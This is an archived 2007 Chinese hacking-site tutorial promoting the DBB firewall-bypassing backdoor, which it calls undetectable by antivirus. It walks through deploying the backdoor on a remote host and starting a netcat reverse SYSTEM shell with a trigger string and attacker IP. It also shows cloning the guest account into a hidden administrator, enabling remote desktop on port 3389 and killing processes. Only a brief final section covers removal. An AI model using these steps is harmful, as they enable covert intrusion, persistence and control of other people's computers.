穿梭于防火墙下的黑马-DBB后门程序 _ 技术文章〓中国安全在线〓打造最优秀的新手成长第一起跑线!

执着成就未来技术成就梦想

新闻: 黑客新闻 IT新闻时事新闻站内新闻漏洞公告病毒公告代理公布论坛新闻安全新闻	论坛
文摘: 入侵攻击漏洞研究操作系统建站技术技巧知识网管天地菜鸟学习安全防护 QQ技巧	学习
软件: 扫描检测远程监控脚本注入拒绝攻击嗅探监听木马后门字典代理密码破解 QQ软件	下载
动画: 入侵动画木马教程漏洞利用加密破解软件应用ＱＱ动画综合教程黑客编程在线服务	动画

文字横幅以及760*60黄金广告位置招租,欢迎恰谈！　广告业务联系QQ:8019399　声明：在本站所投放广告内容均与本站立场无关！

首页 | 新闻 | 漏洞 | 防范 | QQ技巧 | 入侵 | 菜鸟 | 扫描 | 控制 | 后门 | QQ软件 | 注射 | 网管 | 编程 | 文学 | 教程 | 服务| 论坛

您现在的位置：中国安全在线 >> 攻防技术 >> 入侵攻击 >> 文章正文

用户登录

新用户注册

专题栏目

最新推荐

没有相关文章

穿梭于防火墙下的黑马-DBB后门程序

作者：佚名来源：安全在线更新时间：2007-8-6 2:53:24 【字体：小大】
<%=(int(rnd()*1)+1)%>您当前的位置：中国安全在线cnsafer.com　请进入[技术论坛]发表评论阅读提示：今天要为大家介绍的DarkStorm BePassFireWall BackDoor V1.2是一款成功率极高的反弹端口穿透防火墙的后门程序（以下简称DBB），可以穿透99%的防火墙。该后门采用线程插入技术，隐蔽性极高，在系统中以服务形式加载，拥有system权限，一旦运行，很难将其删除。同时，最重要的是，现在还没有杀毒软件能够查杀它，可以说是现在理想的后门程序了。下面就让我们一起来领略一下DBB的独到魅力吧！一、配置后门第一步当然是把三、轻松操纵当回家，在使用后门前，请先用压缩包内的config DarkStorm.exe程序配置后门。双击运行config DarkStorm.exe，打开如图1所示的配置对话窗口，根据提示输入相关数据。其实，该后门支持不经过配置就可直接使用，这时将使用后门的默认配置：反向连接端口是8888，关键字是NOIR，服务名是DNScnsvc。小提示：DBB后门服务端由DarkStorm.exe和DarkStorm.dll组成，这两个exe和DLL文件是可以改名的，但是必须要改成同样的名字，比如，可以把exe文件改名为123.exe，那么dll文件也要相应的改名为123.dll。二、打开后门要运行后门很简单，只要将exe和dll文件上传到远程主机上之后，直接运行exe文件，后门即可被加载。小提示：exe文件和dll文件不必一定要放到system32中，但必须在同一文件夹下。大家都知道，现在很多情况下主机是在防火墙后面的，如何让后门来逃避防火墙的火眼金睛呢？这就需要用反向连接功能。DBB是通过嗅探激活字符来启动反向连接的，仅支持nc反向连接。首先在本地计算机中使用nc监听本地计算机的8888端口，进入命令行状态，运行如下命令： nc -l -p 8888。然后再用nc连接目标主机的任何一个防火墙允许的TCP端口（80/139/445.....），接着再开一个命令行窗口，运行命令：nc 220.202.242.101 139，然后输入激活命令：NOIR:220.202.242.98:8888。其中220.202.242.101为木马服务端IP地址，NOIR为反弹激活字，220.202.242.98：8888为反向连接的IP地址，也就是本机IP地址及端口。如果反向连接成功，就会在本地计算机中得到目标主机的一个系统权限SHELL（如图2）。三、轻松操纵当成功获取了目标计算机的一个系统权限的SHELL后，就等于已经手握该台计算机的生杀大权。令人更加欣喜的是，DBB还拥有一些非常实用的控制功能。 1.帐户克隆为了下次能够顺利控制目标计算机，一般的手法就是克隆一个系统权限的帐户，在这里，使用clone命令就可以轻松克隆一个本地用户。其语法格式为：clone username clonename password，其中，username是被克隆的用户的用户名，一般是administrator；clonename是你要克隆为username的用户名，一般是guest；password是你为克隆用户设置的密码，最长32位。例如，要把Guest克隆为管理员帐户，并且设置密码为snow，就只要运行命令：clone administrator guest snow（如图3）。 2.开启终端服务远程终端服务可以说是最为理想的远程控制方式，因此，当成功入侵目标计算机后，大部分人总是想方设法来开启被控计算机的终端服务。虽然说开启3389终端服务的方法有很多，可都是有一定难度的。不过还好，有了该后门，只要用一条命令就可以轻松开启3389服务，其命令为：term port。例如：运行命令“term 3389”（如图4），这样就将开启目标计算机的端终服务，终端服务通讯端口为3389，重新启动计算机即可生效。小提示：终端服务只在Windows 2000服务器以上版本才拥有。 3.进程管理想知道目标计算机运行了哪些程序吗？很简单，运行命令：pslist，这样就可以显示本地所有用户进程和相对应的pid号。如果想结束某一进程的运行，请运行命令：pskill pid，提示：pid指的是进程ID号（如图5）。另外，还有诸如Logoff（注销当前用户）、Reboot（重启系统）、Shutdown（关闭系统）、Poweroff（关闭电源）等命令可供使用。四、封杀后门如果不幸中了该后门，可以通过如下方法来删除。打开注册表编辑，依次展开如下子键：HKEY_LOCAL_MACHINESYSTEMCurrentControlSet Services，找到并删除该子键下的DNScnsvc键（如图6），再重新启动系统即可。若服务名是自己设定的，请删除相关服务名的子键。小提示：本地计算机即接受反向SHELL的系统，必须拥有独立公网IP上网的计算机。另外，由于该后门使用的是无驱动的嗅探，无法嗅探本机对本机发起的数据请求，所以在对本机的测试中，是无法成功的。您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力
文章录入：ls1238 责任编辑：ls1238
	上一篇文章： Arp欺骗截cookies入侵“中国黑客”网站下一篇文章：山穷水尽的突破
【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

Copyright ?2003-2008 www.cnsafer.com All Rights Reserved.
如有意见请与我们联系　Email:admin#mail.cnsafer.com 联系QQ:8589101
中国安全在线友情提示：建议使用IE6.0或以上版本, 分辩率1024*768进行浏览
敢想敢做挑战自我努力做最好打造最优秀的新手成长第一起跑线
中网科技有限公司技术支持　鄂ICP备05006475号